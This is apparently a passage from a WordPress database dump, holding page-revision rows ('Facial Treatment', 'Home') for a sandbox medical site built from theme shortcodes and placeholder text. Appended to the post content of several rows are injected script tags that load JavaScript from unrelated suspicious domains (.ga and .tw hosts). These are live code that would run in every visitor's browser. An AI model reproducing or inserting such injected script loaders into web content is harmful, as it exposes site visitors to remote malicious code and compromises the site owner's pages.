overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"padding-4-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" bottom_margin=\"20\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/310797/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Content\r\n<i>Creation</i></h3>\r\n\" icon_iconsmind=\"iconsmind-Telescope\" min_height=\"400\"]Far far away, behind the word mountains, far from the countries Vokalia and Consonantia, there live the blind texts. Separated they live on.[/nectar_flip_box][/vc_column_inner][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/190727/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Market\r\n<i>Growth</i></h3>\r\n\" icon_iconsmind=\"iconsmind-Spring\" min_height=\"400\"]The Big Oxmox advised her not to do so, because there were thousands of bad Commas, wild Question Marks and devious Semikoli.[/nectar_flip_box][/vc_column_inner][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/467163/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Ending\r\n<i>Competition</i></h3>\r\n\" icon_iconsmind=\"iconsmind-Grave\" min_height=\"400\"]Pityful a rethoric question ran over her cheek, then she continued her way. On her way she met a copy. The copy warned the Little Blind Text.[/nectar_flip_box][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/422400/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Private\r\n<i>Tutoring</i></h3>\r\n\" icon_iconsmind=\"iconsmind-Face-Style2\" min_height=\"400\"]ar from the countries Vokalia and Consonantia, there live the blind texts. Separated they live in Bookmarksgrove right at the coast.[/nectar_flip_box][/vc_column_inner][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/317099/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Event\r\n<i>Hosting</i></h3>\r\n\" icon_iconsmind=\"iconsmind-The-WhiteHouse\" min_height=\"400\"]Even the all-powerful Pointing has no control about the blind texts it is an almost life One day however a small line of blind text.[/nectar_flip_box][/vc_column_inner][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" offset=\"vc_col-lg-4 vc_col-md-12\"][nectar_flip_box image_url_1=\"https://source.unsplash.com/collection/179646/daily\" bg_color=\"#0a0a0a\" bg_color_overlay=\"true\" text_color=\"light\" icon_family=\"iconsmind\" icon_color=\"Accent-Color\" bg_color_2=\"#1239ff\" text_color_2=\"light\" h_text_align=\"center\" v_text_align=\"center\" flip_direction=\"horizontal-to-left\" front_content=\"\r\n<h3>Browser<i>Addons</i></h3>\r\n\" icon_iconsmind=\"iconsmind-Love-Window\" min_height=\"400\"]But nothing the copy said could convince her and so it didn’t take long until a few insidious Copy Writers ambushed her, made her drunk.[/nectar_flip_box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Facial Treatment','','inherit','closed','closed','','6269-revision-v1','','','2018-01-11 00:48:47','2018-01-11 00:48:47','',6269,'http://sandbox.futuremediatrix.com/medikpro/2018/01/11/6269-revision-v1/',0,'revision','',0),(6614,1,'2018-01-11 00:52:13','2018-01-11 00:52:13','[vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_image=\"6612\" bg_position=\"center center\" bg_repeat=\"no-repeat\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"14%\" bottom_padding=\"12%\" enable_gradient=\"true\" color_overlay=\"#585b64\" color_overlay_2=\"#2c2f38\" gradient_direction=\"left_t_to_right_b\" overlay_strength=\"0.95\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column centered_text=\"true\" column_padding=\"padding-3-percent\" column_padding_position=\"left-right\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"padding-1-percent\" column_padding_position=\"bottom\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"200\"][vc_column_text]\r\n<h1>Content here</h1>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" bottom_padding=\"30\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"300\"][vc_column_text]\r\n<h2>Text here</h2>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" class=\"#2d3538\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][nectar_portfolio layout=\"fullwidth\" constrain_max_cols=\"true\" category=\"all\" project_style=\"6\" item_spacing=\"default\" masonry_style=\"true\" load_in_animation=\"fade_in_from_bottom\"][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"4%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column centered_text=\"true\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h2>Why choose us</h2>\r\n<h5><span style=\"color: #bbbbbb;\">Reason to use our service</span></h5>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" bottom_padding=\"5%\" overlay_strength=\"1\" shape_divider_position=\"bottom\"][vc_column enable_animation=\"true\" animation=\"none\" centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"\" image=\"ecommerce_diamond.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h5>Best Service</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"400\" image=\"basic_compass.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"400\"][vc_column_text]\r\n<h5>Affordable Price</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"800\" image=\"software_layers2.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"800\"][vc_column_text]\r\n<h5>Experienced People</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][divider line_type=\"Full Width Line\" line_thickness=\"1\" divider_color=\"default\"][/vc_column][/vc_row][vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"6%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][testimonial_slider style=\"multiple_visible\" color=\"default\"][testimonial image=\"6247\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491481781-2\" name=\"Aura Brooks\" subtitle=\"Housewife, 2 kids\" quote=\"Quisque sagittis libero tellus. In hac habitasse platea dictumst. Cras convallis ligula eu mi scelerisque placerat. Nulla dui lacus, suscipit quis massa at, pulvinar vulputate ligula. Praesent interdum elementum vehicula.\" id=\"1512922572276-8\"] Click the edit button to add your testimonial. [/testimonial][testimonial image=\"6247\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491481781-2\" name=\"Eve Crawford\" subtitle=\"Company Secretary, That Biz\" quote=\"Vivamus dapibus elit a nisl suscipit, vitae sollicitudin lectus dapibus. Aliquam interdum consectetur mauris in fermentum. In ullamcorper tortor dolor, id malesuada tellus vestibulum a. Mauris ante erat, mollis vel ligula ac, finibus fermentum tellus.\" id=\"1512922572324-0\"] Click the edit button to add your testimonial. [/testimonial][testimonial image=\"6247\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491482058-4\" name=\"Jack Graham\" subtitle=\"Co founder, Coffee Inc\" quote=\"Donec ultricies sapien id quam fringilla laoreet. Donec sem metus, facilisis a mauris ut, placerat convallis nibh. Quisque varius velit eu rutrum suscipit. Orci varius natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Ut eu aliquam lacus. Donec sed turpis vel massa tincidunt elementum. Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" id=\"1512922572363-4\"] Click the edit button to add your testimonial. [/testimonial][/testimonial_slider][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#f7f7f7\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" bottom_padding=\"7%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" top_margin=\"-100\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][recent_posts style=\"default\" category=\"all\" columns=\"3\" order=\"DESC\" orderby=\"date\" posts_per_page=\"3\"][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" top_padding=\"40\" text_align=\"left\"][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" centered_text=\"true\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][button color=\"extra-color-2\" hover_text_color_override=\"#fff\" image=\"default-arrow\" size=\"medium\" url=\"#\" text=\"View All Posts\" color_override=\"\"][/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"40\" bottom_padding=\"40\" enable_gradient=\"true\" color_overlay=\"#585b64\" color_overlay_2=\"#2c2f38\" gradient_direction=\"left_to_right\" overlay_strength=\"1\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][clients columns=\"6\" hover_effect=\"opacity\" additional_padding=\"none\" carousel=\"true\"][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451662966191-10\" name=\"Waveform\" id=\"1451664886009-6\"] Click the edit button to add your testimonial. [/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451662966634-5\" name=\"Boots\" id=\"1451664886043-10\"] Click the edit button to add your testimonial. [/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663102205-9\" name=\"osw\" id=\"1451664886075-8\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663114418-1\" name=\"Six\" id=\"1451664886141-5\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663132415-1\" name=\"Four\" id=\"1451664886163-9\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663143506-0\" name=\"Three Days\" id=\"1451664886197-5\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663102205-9\" name=\"osw\" id=\"1451664700416-0-2\"][/client][/clients][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Home','','inherit','closed','closed','','5-revision-v1','','','2018-01-11 00:52:13','2018-01-11 00:52:13','',5,'http://sandbox.futuremediatrix.com/medikpro/2018/01/11/5-revision-v1/',0,'revision','',0),(6615,1,'2018-01-11 00:52:29','2018-01-11 00:52:29','[vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_image=\"6612\" bg_position=\"center center\" bg_repeat=\"no-repeat\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"14%\" bottom_padding=\"12%\" enable_gradient=\"true\" color_overlay=\"#585b64\" color_overlay_2=\"#2c2f38\" gradient_direction=\"left_t_to_right_b\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column centered_text=\"true\" column_padding=\"padding-3-percent\" column_padding_position=\"left-right\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"padding-1-percent\" column_padding_position=\"bottom\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"200\"][vc_column_text]\r\n<h1>Content here</h1>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" bottom_padding=\"30\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"300\"][vc_column_text]\r\n<h2>Text here</h2>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" class=\"#2d3538\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][nectar_portfolio layout=\"fullwidth\" constrain_max_cols=\"true\" category=\"all\" project_style=\"6\" item_spacing=\"default\" masonry_style=\"true\" load_in_animation=\"fade_in_from_bottom\"][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"4%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column centered_text=\"true\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h2>Why choose us</h2>\r\n<h5><span style=\"color: #bbbbbb;\">Reason to use our service</span></h5>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" bottom_padding=\"5%\" overlay_strength=\"1\" shape_divider_position=\"bottom\"][vc_column enable_animation=\"true\" animation=\"none\" centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"\" image=\"ecommerce_diamond.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h5>Best Service</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"400\" image=\"basic_compass.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"400\"][vc_column_text]\r\n<h5>Affordable Price</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"800\" image=\"software_layers2.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"800\"][vc_column_text]\r\n<h5>Experienced People</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][divider line_type=\"Full Width Line\" line_thickness=\"1\" divider_color=\"default\"][/vc_column][/vc_row][vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"6%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][testimonial_slider style=\"multiple_visible\" color=\"default\"][testimonial image=\"6247\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491481781-2\" name=\"Aura Brooks\" subtitle=\"Housewife, 2 kids\" quote=\"Quisque sagittis libero tellus. In hac habitasse platea dictumst. Cras convallis ligula eu mi scelerisque placerat. Nulla dui lacus, suscipit quis massa at, pulvinar vulputate ligula. Praesent interdum elementum vehicula.\" id=\"1512922572276-8\"] Click the edit button to add your testimonial. [/testimonial][testimonial image=\"6247\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491481781-2\" name=\"Eve Crawford\" subtitle=\"Company Secretary, That Biz\" quote=\"Vivamus dapibus elit a nisl suscipit, vitae sollicitudin lectus dapibus. Aliquam interdum consectetur mauris in fermentum. In ullamcorper tortor dolor, id malesuada tellus vestibulum a. Mauris ante erat, mollis vel ligula ac, finibus fermentum tellus.\" id=\"1512922572324-0\"] Click the edit button to add your testimonial. [/testimonial][testimonial image=\"6247\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491482058-4\" name=\"Jack Graham\" subtitle=\"Co founder, Coffee Inc\" quote=\"Donec ultricies sapien id quam 